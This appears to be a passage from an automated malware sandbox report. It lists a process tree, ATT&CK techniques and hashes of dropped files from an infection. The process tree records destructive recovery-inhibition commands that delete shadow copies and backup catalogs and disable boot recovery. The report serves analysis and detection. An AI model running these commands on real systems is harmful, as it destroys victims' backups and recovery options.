                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                  2⤵
                                                                                    PID:5412
                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                      wmic shadowcopy delete
                                                                                      3⤵
                                                                                        PID:4376
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                      2⤵
                                                                                        PID:5216
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                        2⤵
                                                                                          PID:4948
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                          2⤵
                                                                                            PID:5764
                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                              vssadmin delete shadows /all /quiet
                                                                                              3⤵
                                                                                              • Interacts with shadow copies
                                                                                              PID:6008
                                                                                          • C:\Users\Admin\AppData\Local\Temp\1A3B.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\1A3B.exe" -agent 0
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Program Files directory
                                                                                            • Drops file in Windows directory
                                                                                            PID:2484
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:1632
                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                              wmic shadowcopy delete
                                                                                              3⤵
                                                                                                PID:5636
                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                vssadmin delete shadows /all /quiet
                                                                                                3⤵
                                                                                                • Interacts with shadow copies
                                                                                                PID:3772
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                              2⤵
                                                                                                PID:5072
                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                notepad.exe
                                                                                                2⤵
                                                                                                  PID:4928
                                                                                              • C:\Users\Admin\AppData\Local\Temp\5531.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\5531.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5520
                                                                                                • C:\Users\Admin\AppData\Local\Temp\339802969.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\339802969.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:5280
                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                    3⤵
                                                                                                      PID:5708
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1230843919.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1230843919.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:6076
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      3⤵
                                                                                                        PID:4476
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5BCA.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\5BCA.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4916
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:1008
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:5260
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:5160
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:5644
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5868
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:4472
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:5164
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:1004
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:5912
                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                1⤵
                                                                                                                  PID:972
                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:4268
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                    1⤵
                                                                                                                      PID:5748
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                      1⤵
                                                                                                                        PID:196
                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                        1⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:5604
                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                        1⤵
                                                                                                                        • Modifies registry class
                                                                                                                        PID:3668
                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                        1⤵
                                                                                                                        • Modifies registry class
                                                                                                                        PID:6128
                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 6128 -s 2004
                                                                                                                          2⤵
                                                                                                                          • Program crash
                                                                                                                          PID:5956

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                      Persistence

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      1
                                                                                                                      T1060

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Defense Evasion

                                                                                                                      File Deletion

                                                                                                                      2
                                                                                                                      T1107

                                                                                                                      Modify Registry

                                                                                                                      3
                                                                                                                      T1112

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Install Root Certificate

                                                                                                                      1
                                                                                                                      T1130

                                                                                                                      Credential Access

                                                                                                                      Credentials in Files

                                                                                                                      2
                                                                                                                      T1081

                                                                                                                      Discovery

                                                                                                                      Software Discovery

                                                                                                                      1
                                                                                                                      T1518

                                                                                                                      Query Registry

                                                                                                                      5
                                                                                                                      T1012

                                                                                                                      System Information Discovery

                                                                                                                      5
                                                                                                                      T1082

                                                                                                                      Security Software Discovery

                                                                                                                      1
                                                                                                                      T1063

                                                                                                                      Peripheral Device Discovery

                                                                                                                      2
                                                                                                                      T1120

                                                                                                                      Collection

                                                                                                                      Data from Local System

                                                                                                                      2
                                                                                                                      T1005

                                                                                                                      Command and Control

                                                                                                                      Web Service

                                                                                                                      1
                                                                                                                      T1102

                                                                                                                      Impact

                                                                                                                      Inhibit System Recovery

                                                                                                                      2
                                                                                                                      T1490

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                        MD5

                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                        SHA1

                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                        SHA256

                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                        SHA512

                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                        MD5

                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                        SHA1

                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                        SHA256

                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                        SHA512

                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                      • C:\Program Files\Reference Assemblies\CCCPIAAFQF\ultramediaburner.exe
                                                                                                                        MD5

                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                        SHA1

                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                        SHA256

                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                        SHA512

                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                      • C:\Program Files\Reference Assemblies\CCCPIAAFQF\ultramediaburner.exe
                                                                                                                        MD5

                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                        SHA1

                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                        SHA256

                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                        SHA512

                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                      • C:\Program Files\install.dat
                                                                                                                        MD5

                                                                                                                        31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                        SHA1

                                                                                                                        c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                        SHA256

                                                                                                                        b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                        SHA512

                                                                                                                        3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                      • C:\Program Files\install.dll
                                                                                                                        MD5

                                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                        SHA1

                                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                        SHA256

                                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                        SHA512

                                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                        MD5

                                                                                                                        a4022a7d2b113226b000be0705680813

                                                                                                                        SHA1

                                                                                                                        599e22d03201704127a045ca53ffb78f9ea3b6c3

                                                                                                                        SHA256

                                                                                                                        2557a14e476d55330043af2858dbf1377e24dba3fa9aedc369d5feefefb7f9a7

                                                                                                                        SHA512

                                                                                                                        40ef88632a4ad38a7d21c640a7f0c8cd7c76b8451f55dd758c15baa5a90f4f0938de409426570c4405362fd2d90fadd96d23d190e09692b5fbe2c87ebc8d3c60

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                        MD5

                                                                                                                        c2d06c11dd1f1a8b1dedc1a311ca8cdc

                                                                                                                        SHA1

                                                                                                                        75c07243f9cb80a9c7aed2865f9c5192cc920e7e

                                                                                                                        SHA256

                                                                                                                        91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

                                                                                                                        SHA512

                                                                                                                        db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                        MD5

                                                                                                                        6151ebe0a00f771f7730b88148301c07

                                                                                                                        SHA1

                                                                                                                        e87a8d7d11212285c722da312f4bf8844f29a57f

                                                                                                                        SHA256

                                                                                                                        8d03ee5510bb3f41392668cb88a3dc887870159f273fbf272e7a49c610dcd8c8

                                                                                                                        SHA512

                                                                                                                        1f140104b5e93ed093a22da1c5268c09047a473911c9b5f21f3b70389112272a095837b5c4194e6cd5bafd5ee70c40986b4d1538c3d60926b883236b08c78a30

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                        MD5

                                                                                                                        b224a6a0d0a137b9b380c5c5f546379f

                                                                                                                        SHA1

                                                                                                                        ca0ef4e17c88ac08e7d62e454a524b0e48c4758a

                                                                                                                        SHA256

                                                                                                                        468453e268728d24a5e4b3d5364fceb6227de5bae151ce3fa2e5ec9dd613f10e

                                                                                                                        SHA512

                                                                                                                        7fdb16d5546f1ef22ba5e907ce6f93dbe2aeb12aba0b1f75119996dba43b6d7dea664b316e7c538291d4cf8f661ed47b4bb90da4af609f75ae62da9f686feb6a

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                        MD5

                                                                                                                        ba0627398ae2ba8a6f95286027277695

                                                                                                                        SHA1

                                                                                                                        310861e0bd5c889a899b2bf473b385ed1808fa9d

                                                                                                                        SHA256

                                                                                                                        c20205ccbbddb657f7eecb9fbb484e5139475235a74b3db972336acfd11d0c16

                                                                                                                        SHA512

                                                                                                                        e4821ad4a27db89a754812073c717a92bec898cf51fd98313cab3d79e3b7e13def9e36fee2f31d4e188da40f5ab2d3948a113a44a6ba77caa86b66578379988c

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                        MD5

                                                                                                                        e9513b9186e6f860b2dd3a5042bc1e75

                                                                                                                        SHA1

                                                                                                                        6dccfc853be0013390f6635aae6b203e7141f336

                                                                                                                        SHA256

                                                                                                                        608f5bbcc8df284b4ba2719a832467dbcc2bc8e3ae9b4488d15ffcc0c0528aa9

                                                                                                                        SHA512

                                                                                                                        cfe5d20a1a64ffde3ebfd8c50a55b13a85d5b8f0ebd0562369396eee8e7bf286bb24054fd8df044e1ae0f8e7372d9f75262215acd6c355f0717b9b18cab9bff9

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1rxyd3ny.jqi\inst.exe
                                                                                                                        MD5

                                                                                                                        edd1b348e495cb2287e7a86c8070898d

                                                                                                                        SHA1

                                                                                                                        682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                                        SHA256

                                                                                                                        eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                                        SHA512

                                                                                                                        613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1rxyd3ny.jqi\inst.exe
                                                                                                                        MD5

                                                                                                                        edd1b348e495cb2287e7a86c8070898d

                                                                                                                        SHA1

                                                                                                                        682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                                        SHA256

                                                                                                                        eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                                        SHA512

                                                                                                                        613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\30dztlli.tvg\google-game.exe
                                                                                                                        MD5

                                                                                                                        e27c391b1f65a77478fcab4d5e102cef

                                                                                                                        SHA1

                                                                                                                        44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                                                        SHA256

                                                                                                                        2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                                                        SHA512

                                                                                                                        0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\30dztlli.tvg\google-game.exe
                                                                                                                        MD5

                                                                                                                        e27c391b1f65a77478fcab4d5e102cef

                                                                                                                        SHA1

                                                                                                                        44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                                                        SHA256

                                                                                                                        2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                                                        SHA512

                                                                                                                        0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\42kdtlp3.kau\askinstall39.exe
                                                                                                                        MD5

                                                                                                                        8a0f8e3fe05343e301cd0d213c5257c6

                                                                                                                        SHA1

                                                                                                                        25885a7898a4c31f45523536ef3447fd46f6fa62

                                                                                                                        SHA256

                                                                                                                        3dd53bf240c171977c1039c10a76cc09330ed29f64b08753b57006c4d71e084c

                                                                                                                        SHA512

                                                                                                                        662bffb3397f717bdc9547aafcb1cad555245b7a39bff96b3d0dd258c3051ef033c4cfe8488632cf3e2334bbfcd8dfc7728fee7f853a5b29cc4ecf124b353987

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\42kdtlp3.kau\askinstall39.exe
                                                                                                                        MD5

                                                                                                                        8a0f8e3fe05343e301cd0d213c5257c6

                                                                                                                        SHA1

                                                                                                                        25885a7898a4c31f45523536ef3447fd46f6fa62

                                                                                                                        SHA256

                                                                                                                        3dd53bf240c171977c1039c10a76cc09330ed29f64b08753b57006c4d71e084c

                                                                                                                        SHA512

                                                                                                                        662bffb3397f717bdc9547aafcb1cad555245b7a39bff96b3d0dd258c3051ef033c4cfe8488632cf3e2334bbfcd8dfc7728fee7f853a5b29cc4ecf124b353987

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5c-e5449-593-35f9b-9177bcc495475\Qyqocizhupi.exe
                                                                                                                        MD5

                                                                                                                        18e49540637bccc9b3a7ca3d48cae223

                                                                                                                        SHA1

                                                                                                                        b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                        SHA256

                                                                                                                        698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                        SHA512

                                                                                                                        a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5c-e5449-593-35f9b-9177bcc495475\Qyqocizhupi.exe
                                                                                                                        MD5

                                                                                                                        18e49540637bccc9b3a7ca3d48cae223

                                                                                                                        SHA1

                                                                                                                        b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                        SHA256

                                                                                                                        698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                        SHA512

                                                                                                                        a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5c-e5449-593-35f9b-9177bcc495475\Qyqocizhupi.exe.config
                                                                                                                        MD5

                                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                                        SHA1

                                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                        SHA256

                                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                        SHA512

                                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ayb3q3cy.yh4\GcleanerWW.exe
                                                                                                                        MD5

                                                                                                                        4f4adcbf8c6f66dcfc8a3282ac2bf10a

                                                                                                                        SHA1

                                                                                                                        c35a9fc52bb556c79f8fa540df587a2bf465b940

                                                                                                                        SHA256

                                                                                                                        6b3c238ebcf1f3c07cf0e556faa82c6b8fe96840ff4b6b7e9962a2d855843a0b

                                                                                                                        SHA512

                                                                                                                        0d15d65c1a988dfc8cc58f515a9bb56cbaf1ff5cb0a5554700bc9af20a26c0470a83c8eb46e16175154a6bcaad7e280bbfd837a768f9f094da770b7bd3849f88

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\e7-b673a-6e6-3d391-260c1cf6d9617\Fyjabixovae.exe
                                                                                                                        MD5

                                                                                                                        2e91d25073151415f8c39de2262cbba8

                                                                                                                        SHA1

                                                                                                                        32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                        SHA256

                                                                                                                        0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                        SHA512

                                                                                                                        306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\e7-b673a-6e6-3d391-260c1cf6d9617\Fyjabixovae.exe
                                                                                                                        MD5

                                                                                                                        2e91d25073151415f8c39de2262cbba8

                                                                                                                        SHA1

                                                                                                                        32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                        SHA256

                                                                                                                        0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                        SHA512

                                                                                                                        306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\e7-b673a-6e6-3d391-260c1cf6d9617\Fyjabixovae.exe.config
                                                                                                                        MD5

                                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                                        SHA1

                                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                        SHA256

                                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                        SHA512

                                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\e7-b673a-6e6-3d391-260c1cf6d9617\Kenessey.txt
                                                                                                                        MD5

                                                                                                                        97384261b8bbf966df16e5ad509922db

                                                                                                                        SHA1

                                                                                                                        2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                        SHA256

                                                                                                                        9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                        SHA512

                                                                                                                        b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\hdyd3djp.tv2\c7ae36fa.exe
                                                                                                                        MD5

                                                                                                                        25d73c80837b83579e10abcf09f17902

                                                                                                                        SHA1

                                                                                                                        17c0f2eb59255937e1db7058544647573aab144c

                                                                                                                        SHA256

                                                                                                                        fb7abf5cc230029aed85de54066100ad1f7bc644f0441fde27e79e5e2fe6b1e5

                                                                                                                        SHA512

                                                                                                                        3f3851e6c78d325514863967d5a3cbfa442e5199c54a4980ebcb4d01f37063d678aff7c43db470559fa452892d794971d23b2cb9f4ab2e2c06dc4a30f084a849

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\hdyd3djp.tv2\c7ae36fa.exe
                                                                                                                        MD5

                                                                                                                        25d73c80837b83579e10abcf09f17902

                                                                                                                        SHA1

                                                                                                                        17c0f2eb59255937e1db7058544647573aab144c

                                                                                                                        SHA256

                                                                                                                        fb7abf5cc230029aed85de54066100ad1f7bc644f0441fde27e79e5e2fe6b1e5

                                                                                                                        SHA512

                                                                                                                        3f3851e6c78d325514863967d5a3cbfa442e5199c54a4980ebcb4d01f37063d678aff7c43db470559fa452892d794971d23b2cb9f4ab2e2c06dc4a30f084a849

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\hrz0qrnu.xfl\SunLabsPlayer.exe
                                                                                                                        MD5

                                                                                                                        cbce93a50ef1465334499828576ea11e

                                                                                                                        SHA1

                                                                                                                        30904b183f67884f63c79377b3c03a3d1cd124b2

                                                                                                                        SHA256

                                                                                                                        c35edc940e9974d15591341b4ae40a374f94a5a546be23fdd2b376a6b006840d

                                                                                                                        SHA512

                                                                                                                        eb5768051bd0dbe17cf177bad0468f85c555794aeec852b1008b6a53521ee81f4992ade7822492affa594140145357b5090da677b42138d7ed6777e7eca6f1a8

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\hrz0qrnu.xfl\SunLabsPlayer.exe
                                                                                                                        MD5

                                                                                                                        cbce93a50ef1465334499828576ea11e

                                                                                                                        SHA1

                                                                                                                        30904b183f67884f63c79377b3c03a3d1cd124b2

                                                                                                                        SHA256

                                                                                                                        c35edc940e9974d15591341b4ae40a374f94a5a546be23fdd2b376a6b006840d

                                                                                                                        SHA512

                                                                                                                        eb5768051bd0dbe17cf177bad0468f85c555794aeec852b1008b6a53521ee81f4992ade7822492affa594140145357b5090da677b42138d7ed6777e7eca6f1a8

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-5K4EP.tmp\Install.tmp
                                                                                                                        MD5

                                                                                                                        45ca138d0bb665df6e4bef2add68c7bf

                                                                                                                        SHA1

                                                                                                                        12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                                                                        SHA256

                                                                                                                        3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                                                                        SHA512

                                                                                                                        cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-7HLND.tmp\Ultra.exe
                                                                                                                        MD5

                                                                                                                        cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                        SHA1

                                                                                                                        ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                        SHA256

                                                                                                                        0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                                        SHA512

                                                                                                                        49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-7HLND.tmp\Ultra.exe
                                                                                                                        MD5

                                                                                                                        cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                                                        SHA1

                                                                                                                        ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                                                        SHA256

                                                                                                                        0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                                                        SHA512

                                                                                                                        49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-CQNHM.tmp\ultramediaburner.tmp
                                                                                                                        MD5

                                                                                                                        4e8c7308803ce36c8c2c6759a504c908

                                                                                                                        SHA1

                                                                                                                        a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

